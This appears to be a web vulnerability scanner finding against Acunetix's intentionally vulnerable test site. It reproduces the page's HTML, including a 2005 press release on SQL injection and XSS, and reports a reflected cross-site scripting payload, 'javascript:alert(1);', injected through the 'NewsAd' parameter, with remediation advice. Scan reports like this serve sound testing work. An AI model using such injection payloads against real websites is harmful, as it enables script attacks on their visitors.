WxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBRRqYXZhc2NyaXB0OmFsZXJ0KDEpO2RkKoxf6JZwzTb662XkeQt5bwg6Ohk=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKwuZOHBQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8E3ywfKaHEhONBvXfHBFlrX7Vn9g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          NewsAd
          Attack
          javascript:alert(1);
          Evidence
          javascript:alert(1);
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

